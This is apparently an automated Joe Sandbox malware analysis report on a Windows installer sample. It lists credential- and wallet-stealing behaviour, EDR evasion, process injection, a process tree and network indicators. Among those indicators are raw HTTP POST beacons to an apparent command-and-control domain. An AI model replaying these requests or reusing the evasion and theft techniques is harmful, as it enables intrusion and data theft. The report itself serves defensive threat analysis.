Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w3245.exe

Overview

General Information

Sample name:w3245.exe
Analysis ID:1584991
MD5:e92b4d3ee13da899ea0ad5b54a0094ed
SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
Tags:exeuser-NatrXN1O1
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • w3245.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\w3245.exe" MD5: E92B4D3EE13DA899EA0AD5B54A0094ED)
    • w3245.exe (PID: 7088 cmdline: "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528 MD5: EC4072E1AE2A9316270E6AFD66235A97)
      • RescueCDBurner.exe (PID: 6296 cmdline: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 5828 cmdline: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 4176 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 1216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 1272 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 2352 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1196 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 7688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 7344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8124 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7428 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 6188 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-06T23:04:46.839981+010020283713Unknown Traffic192.168.2.449739104.21.80.52443TCP
2025-01-06T23:04:48.051667+010020283713Unknown Traffic192.168.2.449740104.21.80.52443TCP
2025-01-06T23:04:49.124251+010020283713Unknown Traffic192.168.2.449741104.21.80.52443TCP
2025-01-06T23:05:14.230605+010020283713Unknown Traffic192.168.2.449911104.21.80.52443TCP
2025-01-06T23:05:15.603604+010020283713Unknown Traffic192.168.2.449919104.21.80.52443TCP
2025-01-06T23:05:16.502609+010020283713Unknown Traffic192.168.2.449929104.21.80.52443TCP
2025-01-06T23:05:17.372518+010020283713Unknown Traffic192.168.2.449938104.21.80.52443TCP
2025-01-06T23:05:18.210322+010020283713Unknown Traffic192.168.2.449946104.21.80.52443TCP
2025-01-06T23:05:19.374062+010020283713Unknown Traffic192.168.2.449953104.21.80.52443TCP
2025-01-06T23:05:19.505451+010020283713Unknown Traffic192.168.2.449954104.21.80.52443TCP
2025-01-06T23:05:20.486339+010020283713Unknown Traffic192.168.2.449960104.21.80.52443TCP
2025-01-06T23:05:20.681592+010020283713Unknown Traffic192.168.2.449966104.21.80.52443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007DA0BB DecryptFileW,0_2_007DA0BB
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_007FFA62
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007D9E9E DecryptFileW,DecryptFileW,0_2_007D9E9E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A1A0BB DecryptFileW,1_2_00A1A0BB
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_00A3FA62
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A19E9E DecryptFileW,DecryptFileW,1_2_00A19E9E
Source: RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4946dd66-f
Source: w3245.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile opened: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49966 version: TLS 1.2
Source: w3245.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000000.1658861478.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000000.1665459198.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000002.00000003.1693692874.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715594343.000000006BD71000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000003.00000002.1776456470.000000006B031000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000002.00000002.1715727918.000000006BE31000.00000020.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000003.00000002.1777432976.000000006CBE1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1717094583.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1777831407.000000006CDC1000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_007C3CC4
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00804440 FindFirstFileW,FindClose,0_2_00804440
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_007D9B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A44440 FindFirstFileW,FindClose,1_2_00A44440
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00A19B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00A03CC4
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD981A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6BD981A1
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDCC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_6BDCC8FD
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDCCC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_6BDCCC23
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 4x nop then or byte ptr [edi], dh2_2_6BD87270
Source: Joe Sandbox ViewIP Address: 20.189.173.4 20.189.173.4
Source: Joe Sandbox ViewIP Address: 108.139.47.50 108.139.47.50
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49911 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49929 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49938 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49954 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49960 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49966 -> 104.21.80.52:443
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQContent-Length: 208Host: bamarelakij.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
